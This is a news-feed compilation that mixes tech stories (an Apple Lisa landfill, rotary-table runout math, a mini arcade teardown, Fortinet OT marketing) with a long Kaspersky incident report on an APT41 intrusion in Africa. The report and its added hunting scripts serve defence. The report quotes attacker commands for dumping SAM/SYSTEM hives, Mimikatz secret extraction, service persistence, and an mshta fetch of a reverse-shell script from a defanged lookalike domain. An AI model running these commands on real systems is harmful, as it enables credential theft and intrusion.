Apple tried to make the best of things. The Lisa was followed by the Lisa 2, and it was then rebadged as the Macintosh XL. Ultimately, though, it would never find real purchase in the marketplace, even after severe price cuts down to $3,995 in 1985. By 1986, it was all over—Apple discontinued the Lisa line.
A Lisa, dumped and destroyed. Credit: Kyra Ocean, CC-BY-SA 2.0
The following years weren’t kind. A batch of 5000 Lisas was bought by third-party company Sun Remarketing, which upgraded them and sold them on as “Lisa Professionals” and “Macintosh Professionals.” However, cut to 1989, and Apple had a better idea. The Lisas were going to a dump in Logan, Utah.

The story would end up making the news, with The Herald Journal reporting on what was then an astounding story: 2,700 brand new computers were being sent straight to landfill. This was particularly shocking at the time, given that computers were still relatively novel in the marketplace and sold for an incredibly high price.

The reason behind it was pure business. “Right now, our fiscal year end is fast approaching and rather than carrying that product on the books, this is a better business decision,” Apple spokesperson Carleen Lavasseur told the press. Apple was able to take a tax write-off on the computers, and it was estimated it could reclaim up to $34 for every $100 of depreciated value in the machines, which were now considered obsolete. Apple paid $1.95 a yard for over 880 cubic yards of space at the landfill to dump the machines. Other reports on the event noted that guards apparently stood on site to ensure the machines were destroyed and could not be recovered.

It’s a story that might remind you of Atari’s E.T., another grand embarrassment buried under a pile of trash. Sometimes products fail, and there’s little more to do than call the trucks and haul them away. The Apple Lisa is perhaps one of the nicer machines that’s ever happened to.


hackaday.com/2025/07/21/why-ap…


Bearing Witness: Measuring the Wobbles in Rotary Build


3D printed rotary table

3D printing has simplified the creation of many things, but part of making something is knowing just how much you can rely on it. [BubsBuilds], on his YouTube channel, built a cheap rotary table and then walked through the process of measuring the error inherent in any rotating system.

Starting with a commercial rotary table, [BubsBuilds] decided he wanted a rotary stage that was both lighter and had provisions for motorized movement. Most of the rotary build is 3D printed, with the large housing and table made from PETG, and the geared hub and worm gear printed on a resin printer. The bearings used to support the worm gear are common skateboard bearings. There is also a commercial thrust bearing and 49 larger 9.5mm ball bearings supporting the rotating tabletop.


There are three different types of runout to be measured on a rotating stage: axial, radial, and angular. Axial runout is fairly straightforward to discern by measuring the vertical variation of the table as it rotates. Radial runout measures how true the rotation is around the center of the table. Angular runout measures how level the table stays throughout its range. Since radial and angular runout are tied to each other (a tilted axis shows up as a radial offset that grows with the height at which you measure), [BubsBuilds] showed how you can take measurements at two different heights and use trigonometry to obtain both your radial and angular runout. This is a great walkthrough of how to approach measuring and characterizing a system that has multiple variables at play. Be sure to check out some of the other cool rotary tables we’ve featured.
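As an added example (not code from the video), here is how two indicator sweeps at different heights can be turned into radial and angular runout. The test cylinder, the two heights, the once-per-revolution Fourier fit and the synthetic readings are all my assumptions about the setup, not details from the build.

```python
"""Separate radial from angular runout using indicator sweeps at two heights.

Added example; not code from the BubsBuilds video. Assumed setup: a true test
cylinder is clamped to the table, a dial indicator reads its side at heights h1
and h2 above the tabletop, and readings are taken at n evenly spaced positions
over one revolution. An off-centre axis shifts the reading by the same amount at
every height; a tilted axis shifts it by an amount that grows with height, so
two sweeps let the two effects be separated.
"""
import math


def fundamental(readings):
    """Once-per-revolution component of evenly spaced readings as an (x, y) vector.

    The discrete Fourier coefficients at one cycle per turn pick out the
    eccentricity sinusoid and ignore a constant offset (indicator zero) and
    higher-order lobing of the cylinder.
    """
    n = len(readings)
    ax = 2.0 / n * sum(r * math.cos(2 * math.pi * k / n) for k, r in enumerate(readings))
    ay = 2.0 / n * sum(r * math.sin(2 * math.pi * k / n) for k, r in enumerate(readings))
    return ax, ay


def runout_from_two_heights(h1, readings1, h2, readings2):
    """Return radial TIR at the table surface and the axis tilt.

    The displacement vector at height h is v(h) = e + h * s, where e is the
    eccentricity at the table surface and s is the slope (tan of tilt) vector.
    Two heights give two equations, solved here by straight subtraction.
    """
    v1 = fundamental(readings1)
    v2 = fundamental(readings2)
    sx = (v2[0] - v1[0]) / (h2 - h1)
    sy = (v2[1] - v1[1]) / (h2 - h1)
    ex = v1[0] - h1 * sx
    ey = v1[1] - h1 * sy
    return {
        "eccentricity": (ex, ey),              # same units as the readings
        "radial_tir": 2 * math.hypot(ex, ey),  # peak-to-peak runout at h = 0
        "slope": (sx, sy),                     # displacement per unit height
        "tilt_rad": math.atan(math.hypot(sx, sy)),  # angular runout
    }


def simulated_sweep(h, ecc, slope, n=36, zero=0.0):
    """Constructed (synthetic) indicator readings for a given eccentricity and slope."""
    vx = ecc[0] + h * slope[0]
    vy = ecc[1] + h * slope[1]
    return [zero + vx * math.cos(2 * math.pi * k / n) + vy * math.sin(2 * math.pi * k / n)
            for k in range(n)]


if __name__ == "__main__":
    # Synthetic table: 0.02/0.01 mm eccentricity, about 1 mrad tilt, sweeps at 10 and 50 mm.
    r1 = simulated_sweep(10.0, (0.02, 0.01), (0.001, -0.0005), zero=1.234)
    r2 = simulated_sweep(50.0, (0.02, 0.01), (0.001, -0.0005), zero=0.5)
    res = runout_from_two_heights(10.0, r1, 50.0, r2)
    print(f"radial TIR {res['radial_tir']:.4f} mm, tilt {math.degrees(res['tilt_rad']):.4f} deg")
```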

youtube.com/embed/No_XLqeN2oE?…


hackaday.com/2025/07/21/bearin…


The end of online anonymity


IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and I'm slightly regretting taking my summer vacation early now that a lot of you are downing tools for a well-deserved break. Think of me as you all catch up on your summer reading by the beach.

— A new generation of 'age verification' rules aimed at protecting kids is breaking the long-standing principle that everyone is anonymous online.

— What to expect from the White House's upcoming AI Action plan to be announced on July 23 that will lay out the US federal government's thinking.

— The European Union's next seven-year budget will likely earmark billions of dollars for next-generation technologies and digital rulemaking.

Let's get started:



digitalpolitics.co/newsletter0…


OT Cybersecurity: not just a matter of Directives and Regulations


By Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy

Today it is increasingly evident that Operational Technology (OT) infrastructures, as a consequence of IT/OT convergence and of their greater complexity, are increasingly exposed to new risks. This leads to an exponential growth of the attack surface, which no longer treats IT and OT as two separate worlds but as a single target, opening the way to new threats and vulnerabilities aimed at critical infrastructure as well as at the heart of industrial organisations: production.

This scenario is further highlighted by the figures in the Clusit 2025 report, where the manufacturing sector overtook the financial sector in terms of attacks worldwide. Considering that OT infrastructures, by their very nature, are based on technologies that lack security by design, are typically obsolete and have had few security patches applied over their long lifecycle, it is clear that this context is extremely critical for the proper operation of the organisations that rely on them.
Costel Onufrei, Specialized Systems Engineer OT, Fortinet Italy
Given this complexity, where can one start? By asking concrete questions about how the infrastructure works and which metrics to adopt to protect it. By analysing the associated risks, the areas that require the most urgent intervention can be identified. Typically one starts from a few basic questions:

  • How are the production machines or plants interconnected?
  • How are the internal networks of the production plants managed?
  • Which devices are present inside the OT networks?
  • Do they have known vulnerabilities?
  • How are internal and external accesses to the OT infrastructure tracked?

In this context it becomes essential that companies address OT security challenges with an approach based on international standards and best practices such as NIST or ISA/IEC 62443, putting in place:

Visibility and control of OT assets: Using FortiGate Rugged NGFW and dedicated services such as the FortiGuard OT Security Service, we rely on 3,300 rules tied to OT protocols and 750 IPS rules specific to OT environments, which make it possible to map the OT infrastructure in real time. The service distinguishes legitimate devices from unauthorised ones and also offers over 1,500 virtual patching rules to protect legacy systems from already recognised and classified attacks, intercepting and blocking known exploits (KEV, Known Exploited Vulnerabilities) before they reach vulnerable devices, thereby effectively protecting OT systems that cannot be updated.

Segmentation and containment: To reduce the risk of intrusion, an OT environment with strict access controls through network policies at all access points is required; this approach begins with the creation of network zones and conduits, achievable with FortiGate Rugged NGFW for vertical (north-south) network traffic, and can be further extended with FortiSwitch Rugged, enabling advanced port-level network segmentation. These rugged switches, natively integrated with FortiOS, make it possible to logically isolate production lines, remote access and IT/OT networks, countering unauthorised lateral movement and simplifying security management.

Secure remote access: Allowing remote operators to access OT networks can be extremely beneficial in terms of reduced downtime and faster intervention, but remote access solutions with built-in security functions must be implemented: FortiPAM and FortiSRA (now updated with new credential and secrets management features for OT environments), together with FortiClient and FortiToken, integrable through the Fortinet Security Fabric, help us lay the foundations for protected, controlled and traceable remote access even in distributed or highly sensitive scenarios.

Integration and orchestration: The Fortinet OT Security Platform integrates into the Fortinet Security Fabric to easily enable IT/OT convergence and connectivity. This helps increase visibility and real-time response across the entire attack surface and allows Security Operations Center (SOC) teams to become more efficient and effective in response times across factories, plants and remote sites.

A best practice with positive effects: the Fortinet report
Fortinet's Global 2025 State of Operational Technology and Cybersecurity Report highlights a significant reduction in the number of OT device vendors, an indicator of greater maturity and operational efficiency. Today, 78% of organisations use only one to four OT vendors, demonstrating a consolidation process.

Consolidation of cybersecurity vendors is a sign of maturity, consistent with what is observed among Fortinet customers adopting the Fortinet OT Security platform. Unifying networking and security at remote OT sites has improved visibility and reduced cyber risk, leading to a 93% reduction in incidents compared with a flat network. Fortinet's simplified solutions have also enabled a 7x performance improvement, thanks to reduced triage and configuration times.

It is essential to continue in this direction: protecting industrial environments is no longer a technical matter, but one of business continuity, reputation and competitiveness.

To learn more about the state of OT security in 2025, read Fortinet's full report.

The article OT Cybersecurity: not just a matter of Directives and Regulations originally appeared on il blog della sicurezza informatica.


Reverse Engineering a ‘Tony’ 6502-based Mini Arcade Machine



The mainboard of the mini arcade unit with its blob chip and EEPROM. (Credit: Poking Technology, YouTube)
For some reason, people are really into tiny arcade machines that basically require you to ruin your hands and eyes in order to play on them. That said, unlike the fifty gazillion ‘retro consoles’ that you can buy everywhere, the particular mini arcade machine that [David Given] of [Poking Technology] obtained from AliExpress for a teardown and ROM dump seems to have custom games rather than the typical gaggle of NES games and fifty ROM hack variations of each.

After a bit of gameplay to demonstrate the various games on the very tiny machine with tiny controls and a tiny 1.8″, 160×128 ST7735 LCD, the device was disassembled. Inside is a fairly decent speaker, the IO board for the controls, and the mainboard with an epoxy blob-covered chip and the SPI EEPROM containing the software. Dumping this XOR ‘encrypted’ ROM was straightforward, revealing it to be a 4 MB, W23X32-compatible EEPROM.


Further reverse-engineering showed the CPU to be a WDC 65C02-compatible chip, running at 8 MHz with 2 kB of SRAM and 8 kB of fast ROM in addition to a 24 MHz link to the SPI EEPROM, which is used heavily during rendering. [David] created a basic SDK for those who feel like writing their own software for this mini arcade system. Considering the market that these mini arcade systems exist in, you’ve got to give the manufacturer credit for creating a somewhat original take, with hardware that is relatively easy to mod and reprogram.

Thanks to [Clint Jay] for the tip.

youtube.com/embed/jJ0XmZvR4bU?…


hackaday.com/2025/07/21/revers…


Rumble in the jungle: APT41’s new target in Africa



Introduction


Some time ago, Kaspersky MDR analysts detected a targeted attack against government IT services in the African region. The attackers used hardcoded names of internal services, IP addresses, and proxy servers embedded within their malware. One of the C2s was a captive SharePoint server within the victim’s infrastructure.

During our incident analysis, we were able to determine that the threat actor behind the activity was APT41. This is a Chinese-speaking cyberespionage group known for targeting organizations across multiple sectors, including telecom and energy providers, educational institutions, healthcare organizations and IT energy companies in at least 42 countries. It’s worth noting that, prior to the incident, Africa had experienced the least activity from this APT.

Incident investigation and toolkit analysis

Detection


Our MDR team identified suspicious activity on several workstations within an organization’s infrastructure. These were typical alerts indicating the use of the WmiExec module from the Impacket toolkit. Specifically, the alerts showed the following signs of the activity:

  • A process chain of svchost.exe ➔exe ➔ cmd.exe
  • The output of executed commands being written to a file on an administrative network share, with the file name consisting of numbers separated by dots:

WmiExec process tree

The attackers also leveraged the Atexec module from the Impacket toolkit.

Scheduler tasks created by Atexec

The attackers used these commands to check the availability of their C2 server, both directly over the internet and through an internal proxy server within the organization.

The source of the suspicious activity turned out to be an unmonitored host that had been compromised. Impacket was executed on it in the context of a service account. We would later get that host connected to our telemetry to pinpoint the source of the infection.

After the Atexec and WmiExec modules finished running, the attackers temporarily suspended their operations.

Privilege escalation and lateral movement


After a brief lull, the attackers sprang back into action. This time, they were probing for running processes and occupied ports:
cmd.exe /c netstat -ano > C:\Windows\temp\temp_log.log
cmd.exe /c tasklist /v > C:\Windows\temp\temp_log.log
They were likely trying to figure out if the target hosts had any security solutions installed, such as EDR, MDR or XDR agents, host administration tools, and so on.

Additionally, the attackers used the built-in reg.exe utility to dump the SYSTEM and SAM registry hives.
cmd.exe /c reg save HKLM\SAM C:\Windows\temp\temp_3.log
cmd.exe /c reg save HKLM\SYSTEM C:\Windows\temp\temp_4.log
On workstations connected to our monitoring systems, our security solution blocked the activity, which resulted in an empty dump file. However, some hosts within the organization were not secured. As a result, the attackers successfully harvested credentials from critical registry hives and leveraged them in their subsequent attacks. This underscores a crucial point: to detect incidents promptly and minimize damage, security solution agents must be installed on all workstations across the organization without exception. Furthermore, the more comprehensive your telemetry data, the more effective your response will be. It’s also crucial to keep a close eye on the permissions assigned to service and user accounts, making sure no one ends up with more access rights than they really need. This is especially true for accounts that exist across multiple hosts in your infrastructure.

In the incident we’re describing here, two domain accounts obtained from a registry dump were leveraged for lateral movement: a domain account with local administrator rights on all workstations, and a backup solution account with domain administrator privileges. The local administrator privileges allowed the attackers to use the SMB protocol to transfer tools for communicating with the C2 to the administrative network share C$. We will discuss these tools – namely Cobalt Strike and a custom agent – in the next section.

In most cases, the attackers placed their malicious tools in the C:\WINDOWS\TASKS\ directory on target hosts, but they used other paths too:
c:\windows\tasks\
c:\programdata\
c:\programdata\usoshared\
c:\users\public\downloads\
c:\users\public\
c:\windows\help\help\
c:\users\public\videos\
Files from these directories were then executed remotely using the WMI toolkit:

Lateral movement via privileged accounts

C2 communication
Cobalt Strike


The attackers used Cobalt Strike for C2 communication on compromised hosts. They distributed the tool as an encrypted file, typically with a TXT or INI extension. To decrypt it, they employed a malicious library injected into a legitimate application via DLL sideloading.

Here’s a general overview of how Cobalt Strike was launched:

Attackers placed all the required files – the legitimate application, the malicious DLL, and the payload file – in one of the following directories:
C:\Users\Public\
C:\Users\{redacted}\Downloads\
C:\Windows\Tasks\
The malicious library was a legitimate DLL modified to search for an encrypted Cobalt Strike payload in a specifically named file located in the same directory. Consequently, the names of the payload files varied depending on what was hardcoded into the malicious DLL.

During the attack, the threat actor used the following versions of modified DLLs and their corresponding payloads:

Legitimate file name    DLL             Encrypted Cobalt Strike
--------------------    ------------    -----------------------
TmPfw.exe               TmDbg64.dll     TmPfw.ini
cookie_exporter.exe     msedge.dll      Logs.txt
FixSfp64.exe            log.dll         Logs.txt
360DeskAna64.exe        WTSAPI32.dll    config.ini
KcInst.exe              KcInst32.dll    kcinst.log
MpCmdRunq.exe           mpclient.dll    Logs.txt

Despite using various legitimate applications to launch Cobalt Strike, the payload decryption process was similar across instances. Let’s take a closer look at one example of Cobalt Strike execution, using the legitimate file cookie_exporter.exe, which is part of Microsoft Edge. When launched, this application loads msedge.dll, assuming it’s in the same directory.

The attackers renamed cookie_exporter.exe to Edge.exe and replaced msedge.dll with their own malicious library of the same name.

When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host. The malicious code would not run if it detected any of the following language packs:

  • Japanese (Japan)
  • Korean (South Korea)
  • Chinese (Mainland China)
  • Chinese (Taiwan)

If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.

The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.

The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.

The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:

Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.

Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.

Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:
C:\Windows\system32\cmd.exe /C sc create "server power" binpath= "cmd /c start C:\Windows\tasks\Edge.exe" && sc description "server power" "description" && sc config "server power" start= auto && net start "server power"
Attackers often use the following service names for embedding Cobalt Strike:
server power
WindowsUpdats
7-zip Update
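One way to turn the table of host EXE / hijacked DLL / payload names above into a host sweep, as an added example that is not Kaspersky's tooling. It keys on the DLL name turning up in one of the staging directories the report lists, because the host EXE may be renamed (cookie_exporter.exe became Edge.exe); the Pillager and Mimikatz pairs described further down are included as assumptions in the same list, and the demo directory is constructed.

```python
"""Sweep staging directories for the DLL-sideloading triples this report lists.

Added example; it is not Kaspersky's tooling. KNOWN_TRIPLES holds the
(legitimate host EXE, hijacked DLL name, payload file) rows from the Cobalt
Strike table, plus the Pillager (convert-moftoprovider.exe / wmicodegen.dll)
and Mimikatz (java.exe / jli.dll / config.ini) pairs the report describes.
A hit is keyed on the DLL name appearing in a user-writable staging
directory; it scores higher when any .exe and the expected payload file sit
beside it. STAGING_DIRS are the drop paths named in the report.
"""
import os
import tempfile

KNOWN_TRIPLES = [
    ("TmPfw.exe", "TmDbg64.dll", "TmPfw.ini"),
    ("cookie_exporter.exe", "msedge.dll", "Logs.txt"),
    ("FixSfp64.exe", "log.dll", "Logs.txt"),
    ("360DeskAna64.exe", "WTSAPI32.dll", "config.ini"),
    ("KcInst.exe", "KcInst32.dll", "kcinst.log"),
    ("MpCmdRunq.exe", "mpclient.dll", "Logs.txt"),
    ("convert-moftoprovider.exe", "wmicodegen.dll", None),  # Pillager; no separate payload file named
    ("java.exe", "jli.dll", "config.ini"),                   # Mimikatz
]

STAGING_DIRS = [
    r"C:\Windows\Tasks", r"C:\ProgramData", r"C:\ProgramData\USOShared",
    r"C:\Users\Public", r"C:\Users\Public\Downloads", r"C:\Users\Public\Videos",
    r"C:\Windows\Help\Help",
]


def findings_for(names, path="<constructed>"):
    """Match one directory listing against KNOWN_TRIPLES; returns a list of finding dicts.

    Matching is case-insensitive because NTFS is.
    """
    lower = {n.lower(): n for n in names}
    exes = sorted(lower[n] for n in lower if n.endswith(".exe"))
    findings = []
    for exe, dll, payload in KNOWN_TRIPLES:
        if dll.lower() not in lower:
            continue
        payload_present = payload is not None and payload.lower() in lower
        if exes and (payload_present or payload is None):
            severity = "high"     # full sideloading kit staged together
        elif exes:
            severity = "medium"   # DLL beside an EXE, payload not (yet) dropped
        else:
            severity = "low"      # stray copy of a hijacked DLL name
        findings.append({
            "dir": path,
            "dll": lower[dll.lower()],
            "expected_exe": exe,
            "exes_present": exes,
            "payload_present": payload_present,
            "severity": severity,
        })
    return findings


def scan_dir(path):
    """List one directory (non-recursive) and match it; unreadable dirs yield nothing."""
    try:
        names = os.listdir(path)
    except OSError:
        return []
    return findings_for(names, path)


def scan(dirs=STAGING_DIRS):
    """Scan every staging directory and return all findings."""
    findings = []
    for d in dirs:
        findings.extend(scan_dir(d))
    return findings


def constructed_demo():
    """Recreate the Edge.exe / msedge.dll / Logs.txt layout in a temp dir and scan it."""
    tmp = tempfile.mkdtemp(prefix="sideload_demo_")
    for name in ("Edge.exe", "msedge.dll", "Logs.txt"):
        open(os.path.join(tmp, name), "wb").close()
    return scan_dir(tmp)


if __name__ == "__main__":
    for f in constructed_demo() + scan():
        print(f["severity"], f["dir"], f["dll"], "expected host:", f["expected_exe"])
```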

Agent


During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:

The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.

While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.

The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.

It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:


Obtaining a command shell: reverse shell via an HTA file


If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download a malicious HTA file containing an embedded JavaScript script from an external resource and run it:
"cmd.exe" /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.

At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.

The harmless script found on github[.]githubassets[.]net

However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.
Once launched, the script gathers initial host information:

It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.


Data collection


Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.

Pillager


A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.

The primary types of data collected by this utility include:

  • Saved credentials from browsers, databases, and administrative utilities like MobaXterm
  • Project source code
  • Screenshots
  • Active chat sessions and data
  • Email messages
  • Active SSH and FTP sessions
  • A list of software installed on the host
  • Output of the systeminfo and tasklist commands
  • Credentials stored and used by the operating system, and Wi-Fi network credentials
  • Account information from chat apps, email clients, and other software

A sample of data collected by Pillager:

The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.

Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:\Windows\Temp\Pillager.zip.

It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.

Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:

Checkout


The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.

When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.

Data collection and archiving in Checkout

Checkout launch diagram in Kaspersky Threat Intelligence Platform

RawCopy


Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.

RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.

The following commands were used to collect registry files:
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\system /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\sam /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\security /OutputPath:c:\users\public\downloads

Mimikatz


The attackers also used Mimikatz to dump account credentials. As with the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. That DLL was then loaded via DLL sideloading by a legitimate copy of java.exe, the Java launcher: at startup java.exe loads jli.dll from its own directory, so a malicious jli.dll dropped beside a copy of the launcher in C:\Windows\Temp is picked up in place of the real one. The following files were involved in launching Mimikatz:
C:\Windows\Temp\123.bat
C:\Windows\Temp\jli.dll
C:\Windows\Temp\java.exe
C:\Windows\Temp\config.ini
123.bat is a batch script that launches the legitimate java.exe, which in turn loads the sideloaded jli.dll. The DLL then decrypts and executes config.ini, the Mimikatz configuration file, which is distributed from a previously compromised host within the infrastructure. The launch command line was:
java.exe privilege::debug token::elevate lsadump::secrets exit
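The RawCopy commands and the java.exe launch line above are both visible in process-creation telemetry, so a hunt can key on the command-line shapes rather than on file hashes. The script below is an added example, not tooling from the report: it flags raw or reg.exe copies of the SAM/SYSTEM/SECURITY hives, Mimikatz module::command syntax regardless of the binary that carries it, and the two sideload hosts the report names (java.exe and convert-moftoprovider.exe) when they run from the staging paths mentioned in the text (C:\Windows\Temp, C:\Users\Public). The sample events are constructed to mirror those shapes; the regexes and the staging-directory list are the author's assumptions, not indicators from the incident.

```python
"""Hunt process-creation events for the credential-access tradecraft above:
RawCopy or reg.exe pulling the SAM/SYSTEM/SECURITY hives, Mimikatz module
syntax handed to a sideloaded host, and sideload hosts launched from staging
directories. Added example; SAMPLE_EVENTS are constructed, not incident data."""
import re
from dataclasses import dataclass

# Hives whose raw copies yield local password hashes and LSA secrets.
HIVE_RE = re.compile(r"(?:system32\\config\\|hklm\\)(sam|system|security)\b", re.I)
# RawCopy's raw-read syntax, as in the commands quoted in the report.
RAWCOPY_RE = re.compile(r"rawcopy(?:\.exe)?\s.*?/filenamepath:", re.I)
# reg.exe save/export: the "standard" hive dump the text contrasts RawCopy with.
REG_SAVE_RE = re.compile(r"\breg(?:\.exe)?\s+(?:save|export)\b", re.I)
# Mimikatz module::command tokens, whatever binary carries them.
MIMIKATZ_RE = re.compile(r"\b(?:privilege|token|lsadump|sekurlsa|kerberos)::[a-z]+", re.I)
# Staging directories named in the write-up (assumed list; extend per estate).
STAGING_RE = re.compile(r"^[a-z]:\\(?:windows\\temp|users\\public)\\", re.I)
# Legitimate executables the report names as DLL-sideloading hosts.
SIDELOAD_HOSTS = {"java.exe", "convert-moftoprovider.exe"}


@dataclass
class Finding:
    host: str
    rule: str
    detail: str


def hunt(events):
    """events: iterable of dicts with 'host', 'image' (full path) and 'cmdline'."""
    findings = []
    for ev in events:
        host, cmd = ev["host"], ev["cmdline"]
        image = ev["image"].strip('"')
        exe = image.rsplit("\\", 1)[-1].lower()
        staged = bool(STAGING_RE.match(image))

        # Hive copy: a hive name in the command line plus a raw/reg copy verb.
        hives = sorted({m.group(1).lower() for m in HIVE_RE.finditer(cmd)})
        if hives and (RAWCOPY_RE.search(cmd) or REG_SAVE_RE.search(cmd)):
            tool = "rawcopy" if RAWCOPY_RE.search(cmd) else "reg.exe"
            findings.append(Finding(host, "hive_dump", f"{tool} copied {','.join(hives)} hive(s)"))

        # Mimikatz syntax survives even when the binary is renamed or sideloaded.
        mods = sorted({m.group(0).lower() for m in MIMIKATZ_RE.finditer(cmd)})
        if mods:
            findings.append(Finding(host, "mimikatz_syntax", f"{exe} passed {', '.join(mods)}"))

        # A known sideload host running from a staging path is suspicious on its own.
        if staged and exe in SIDELOAD_HOSTS:
            findings.append(Finding(host, "sideload_host", f"{exe} launched from staging path {image}"))
    return findings


SAMPLE_EVENTS = [  # constructed to mirror the command shapes quoted in the report
    {"host": "srv01", "image": r"c:\users\public\downloads\RawCopy.exe",
     "cmdline": r"c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\sam /OutputPath:c:\users\public\downloads"},
    {"host": "srv01", "image": r"C:\Windows\Temp\java.exe",
     "cmdline": r"java.exe privilege::debug token::elevate lsadump::secrets exit"},
    {"host": "srv02", "image": r"C:\Windows\Temp\convert-moftoprovider.exe",
     "cmdline": r"convert-moftoprovider.exe"},
    {"host": "ws07", "image": r"C:\Program Files\Java\jdk-17\bin\java.exe",
     "cmdline": r'"C:\Program Files\Java\jdk-17\bin\java.exe" -jar C:\apps\build.jar'},
    {"host": "ws07", "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\SYSTEM\CurrentControlSet\Services\Tcpip"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"{f.host:6} {f.rule:16} {f.detail}")
```

The benign java.exe under Program Files and the reg.exe query that merely names HKLM\SYSTEM produce nothing, which is the point of pairing the hive name with a copy verb and the host name with a staging path: either half alone is common in a normal estate.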

Retrospective threat hunting


As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.

These included the aforementioned Cobalt Strike implant located in c:\programdata\, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:
c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\dedc22b8\49ac6571\app_web_hdmuushc.dll
MD5: 0x70ECD788D47076C710BF19EA90AB000D
These temporary files are automatically generated and contain the ASPX page code:

The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.

This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.

Attribution

